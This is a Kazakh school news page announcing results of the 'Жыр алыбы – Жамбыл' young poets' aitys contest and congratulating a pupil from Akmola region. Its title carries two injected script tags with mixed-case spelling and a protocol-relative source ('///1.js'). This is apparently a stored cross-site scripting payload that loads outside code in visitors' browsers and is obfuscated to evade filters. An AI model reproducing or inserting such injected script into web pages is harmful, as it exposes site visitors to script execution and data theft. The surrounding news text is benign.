«Жыр алыбы-Жамбыл» республикалық жас ақындар конкурсының қорытындысы<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>

04.10.2023

2023 жылғы 28-29 қыркүйек аралығында Алматы облысы, Жамбыл ауданы,Ұзынағаш ауылында жалпы білім беретін мектеп оқушылары арасында «Жыр алыбы – Жамбыл» атты республикалық жас ақындар айтысы өтті. 

Оқушылар арасында Жамбыл Жабаевтың шығармаларын насихаттау, суырып салмалық қабілеттерін, табиғи дарындарын анықтау және айтыскер жас ақындарға әлеуметтік-рухани қолдау көрсетіп, олармен шығармашылық жұмыс түрлерін жандандыру мақсатын көздейтін сайыс екі номинация бойынша өтті:

1.Тақырыптық айтыс

2.Қайым айтыс

Республикалық жас ақындар айтысы  қорытындысы «Қайым айтыс» номинациясы бойынша ІІ-дәрежелі дипломмен 100 000 теңгелік ақшалай сертификатпен - Ақмола облысы білім басқармасының Ерейментау ауданы бойынша білім бөлімі, Еркіншілік ауылының жалпы орта білім беретін мектебінің 9-сынып оқушысы Серигболатұлы Сәттібек марапатталды.

Жеңімпазымызды шын жүректен құттықтаймыз және жаңа жетістіктер тілейміз!

Просмотров: 737


Пікір қосу



Деректерді қолтаңбаға қосу